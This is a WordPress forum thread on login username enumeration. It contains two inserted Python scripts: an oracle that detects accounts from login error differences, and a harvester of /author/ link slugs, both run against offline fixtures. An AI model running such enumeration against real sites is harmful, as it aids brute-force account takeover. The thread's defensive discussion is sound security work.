1. Samvel Gevorgyan
    Posted 4 years ago #

    Hi everyone. Today I tested some WordPress websites and found a potentially dangerous mistake in the user login system prior to version 3.1.

    Most developers who install WordPress on their server leave the default admin username, admin, which is not so difficult to guess. If you try to log in using the username admin with a wrong password, you get the system message "ERROR: The password you entered for the username admin is incorrect. Lost your password?". If you try to log in using the username administrator, or any other wrong username, with a wrong password, you get the system message "ERROR: Invalid username. Lost your password?".

    So this is a potentially dangerous mistake in the login system: it allows an attacker to guess the username, which means 50% of the hacking attempt is done, and the only thing he still needs to do is guess the password.

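The oracle described in the post above, as an added example that is not part of the original thread and not WordPress code: it classifies failed-login pages by the two distinct messages quoted, and also shows the more general differential form of the same attack (compare each candidate's response against the response for a name that certainly does not exist). Everything runs offline against constructed HTML fixtures; the fixture account names, paths and the hardened site's generic wording are assumptions for the demo.

```python
"""
Added example (not from the forum thread or WordPress itself): a username
enumeration oracle built on the two error messages quoted in the post.
Runs offline against constructed login responses: one mimicking the
pre-3.1 behaviour, one mimicking a hardened site with a single generic
message.  Account names, paths and wording are assumptions for the demo.
"""
import re

# The two messages quoted in the original post.  The first is only sent
# when the username exists, the second only when it does not.
_KNOWN_USER = re.compile(r"password you entered for the username", re.I)
_UNKNOWN_USER = re.compile(r"Invalid username\.", re.I)


def classify_login_response(html):
    """Classify one failed-login page as 'exists', 'absent' or 'unknown'."""
    if _KNOWN_USER.search(html):
        return "exists"
    if _UNKNOWN_USER.search(html):
        return "absent"
    return "unknown"


def enumerate_by_message(candidates, login_attempt):
    """Message-based oracle: keep the candidates whose failure page says the
    password (not the username) was wrong.  login_attempt(name) returns the
    HTML body of a login with that name and a deliberately wrong password."""
    return [name for name in candidates
            if classify_login_response(login_attempt(name)) == "exists"]


def enumerate_by_difference(candidates, login_attempt):
    """Differential oracle, the general form of the same attack: compare each
    candidate's failure page with the page returned for a name that certainly
    does not exist.  Any difference left after removing the echoed username
    means the server treated the candidate differently, i.e. the account
    exists.  Works without knowing the exact wording, and yields nothing on a
    site whose failure page is identical for every username."""
    probe = "zz-no-such-user-9f3c"            # assumed not to be an account
    baseline = _normalise(login_attempt(probe), probe)
    return [name for name in candidates
            if _normalise(login_attempt(name), name) != baseline]


def _normalise(html, username):
    """Strip the echoed username and collapse whitespace so that only real
    behavioural differences remain."""
    without_name = re.sub(r"\b%s\b" % re.escape(username), "", html)
    return re.sub(r"\s+", " ", without_name).strip()


# --- constructed fixtures (no network; they stand in for wp-login.php) -----
_ACCOUNTS = {"admin", "editor"}              # assumed accounts on the test site
_LOST = '<a href="/wp-login.php?action=lostpassword">Lost your password?</a>'


def vulnerable_site(username):
    """Mimics the pre-3.1 messages quoted in the post."""
    if username in _ACCOUNTS:
        return ('<div id="login_error"><strong>ERROR</strong>: The password you '
                'entered for the username <strong>%s</strong> is incorrect. %s'
                '</div>' % (username, _LOST))
    return ('<div id="login_error"><strong>ERROR</strong>: Invalid username. '
            '%s</div>' % _LOST)


def hardened_site(username):
    """Same generic text whether or not the account exists."""
    return ('<div id="login_error"><strong>ERROR</strong>: The username or '
            'password you entered is incorrect. %s</div>' % _LOST)


if __name__ == "__main__":
    wordlist = ["admin", "administrator", "editor", "bob"]
    print("vulnerable, by message:   ", enumerate_by_message(wordlist, vulnerable_site))
    print("vulnerable, by difference:", enumerate_by_difference(wordlist, vulnerable_site))
    print("hardened,   by message:   ", enumerate_by_message(wordlist, hardened_site))
    print("hardened,   by difference:", enumerate_by_difference(wordlist, hardened_site))
```

The differential form is the one to reach for in practice: the fix is not just changing the wording but making the whole failure response (body, status code, timing) identical for existing and non-existing accounts, otherwise the message-based check fails while the differential one still succeeds.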

  2. fonglh
    Posted 4 years ago #

    This seems to be by design, for better usability.


  3. Boyevul
    Posted 4 years ago #

    There is also the option to change the username from admin to something else when initially setting up the install.

  4. Samvel Gevorgyan
    Posted 4 years ago #

    Yes, in WordPress you have the option to change the default username. But on 90% of websites based on WordPress, you can simply open any topic/post created by the Administrator and see something like "posted by Administrator", or whoever he is.

  5. PlywoodMillionaire
    Posted 4 years ago #

    I agree with the original post. It became common to provide only ambiguous login failure errors over 5 years ago.

    In addition, the roadmap should include abandoning the "your password will be emailed" pattern in favor of the more common "please confirm your email" pattern...also circa 5-8 years ago. The current WP registration pattern requires copy and paste. I've watched users fumble over this countless times in usability testing. I've even seen users try to log in with their email address as the password because they don't understand how you can register without creating a password.

    The more of these patterns WP brings up to date, the more bloggers they'll alienate, unfortunately. So...it's up to plugins to solve all of these problems...which they do.

  6. Did you know that on 90% of unix servers, there's an account called root? That controls everything?

    This is not as much a security feature as you might think, the idea of changing admin to something else. Just because someone knows the ID doesn't make it more or less secure. I mean, my ID is Ipstenu. It's an admin ID. What makes my ID secure is my PASSWORD.

    I've never run into anyone who had a problem understanding that email confirmation might include getting a password emailed to them. That said, the verbiage could stand an update.

  7. Samvel Gevorgyan
    Posted 4 years ago #

    There is no absolute protection in this world, and the only thing we all do is add more and more security layers to deny malicious users access to a particular resource. In other words, we have gates, dogs inside the gates, doors, windows, locks on the doors, alarm systems in the house and finally the safe. So if for me it's too hard to jump over the gate, there will be people for whom it is not so difficult to bypass all these security layers and open the safe.
    I mean we make it time-consuming for malicious users to hack the system.
    So your username is as important as your password. Because if I know your username I'll try a brute-force attack to find your password. Otherwise it may take more than a month to try all the combinations of usernames and passwords at the same time, which is time-consuming, and while someone tries this you will probably have changed the password.
    One thing I'll tell you about *nix machines: it's the same thing on those machines. You don't know what users are in the /etc/passwd file; otherwise you could take the name of the ftp user and try one of the thousands of ftp brute-forcers on the web. But those usernames are in a safe place, and for security reasons it's recommended to change the default usernames.

  8. Wanna know how easy it is to sort out YOUR id on YOUR WP install? Click on the bloody 'author' link most people leave there. domain.com/author/USERNAME. Boom. I've got it.

    That's not going to make a whit of difference in the long run.

    Try this: http://wordpress.org/extend/plugins/limit-login-attempts/
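The author-link leak described in the post above (domain.com/author/USERNAME), as an added example that is not part of the original thread and not WordPress code: it harvests candidate account names from the author archive links on a page. It runs offline over a constructed HTML fragment; the hostnames, slugs and markup are assumptions for the demo. One caveat worth knowing: the slug in /author/ is the user's "nicename", which by default is the sanitised login name but can be changed, so the output is a list of candidates to feed into a login oracle, not confirmed usernames.

```python
"""
Added example (not from the forum thread or WordPress itself): collect
candidate usernames from WordPress author archive links of the form
/author/<slug>/.  Runs offline over constructed HTML; hostnames, slugs
and markup are assumptions for the demo.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse


class _LinkCollector(HTMLParser):
    """Gather every href on the page; stdlib parser, tolerant of sloppy HTML."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.hrefs.append(value)


def author_slugs_from_html(html, site_host=None):
    """Return the ordered, de-duplicated list of slugs found in
    /author/<slug>/ links.

    site_host, if given, keeps only links on that host (relative links
    are always kept) so that a blogroll link to someone else's author
    page is not mistaken for a local account.
    Caveat: the slug is the user's nicename; by default it is the
    sanitised login name, but it can differ, so treat it as a candidate.
    """
    collector = _LinkCollector()
    collector.feed(html)
    seen = []
    for href in collector.hrefs:
        parsed = urlparse(href)
        if site_host and parsed.netloc and parsed.netloc != site_host:
            continue
        parts = [p for p in parsed.path.split("/") if p]
        if len(parts) >= 2 and parts[0] == "author":
            slug = parts[1]
            if slug not in seen:
                seen.append(slug)
    return seen


# Constructed page fragment mimicking a typical theme's post meta line.
SAMPLE_PAGE = """
<div class="post">
  <p class="meta">Posted by <a href="http://example.com/author/admin/">Administrator</a>
  in <a href="http://example.com/category/news/">News</a></p>
</div>
<div class="post">
  <p class="meta">Posted by <a href="/author/ipstenu/" title="Posts by Ipstenu">Ipstenu</a></p>
</div>
<div class="post">
  <p class="meta">Posted by <a href="http://example.com/author/admin/">Administrator</a></p>
</div>
<p>Blogroll: <a href="http://other.example.net/author/guest/">a friend's blog</a></p>
"""


if __name__ == "__main__":
    print("local author slugs:", author_slugs_from_html(SAMPLE_PAGE, "example.com"))
    print("all author slugs:  ", author_slugs_from_html(SAMPLE_PAGE))
```

Pair the output with the login check from the first post: the display name ("Administrator") is what the theme shows, but the slug in the link ("admin") is what an attacker actually needs, which is why hiding the display name alone does not help.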

  9. Boyevul
    Posted 4 years ago #

    I use Login Lockdown and I believe Theme My Login has some security features in it that limit login attempts. There are also stat browsers that you can implement that log IP addresses and what they were trying to do while visiting your site, allowing you to effectively blacklist by IP.

    Then again, nobody said you couldn't create an admin account, give it a 60 character password, and then post under a different account that only has limited functionality on the site itself.

    For every way there is to hack an account, there are 5 more ways to make that account more secure.

  10. Samvel Gevorgyan
    Posted 4 years ago #

    ..sure, guys, there are many, many other ways to make it hard for an attacker to break into your system, such as limiting login attempts or assigning minimum privileges to the default users, etc.

    ..you know, I like the way the login system works on wordpress.org. Unlike other systems, the username and the password are both important in this system. I mean, the username is case sensitive, and that's great, because in the blog posts this website may show the usernames in lower case, and only the owner of that profile will know whether his username is uSeRnaMe, USERNAME, username, etc. This adds double protection to the system, and if you also add a limit on login attempts, etc., it becomes almost impossible to break an account.
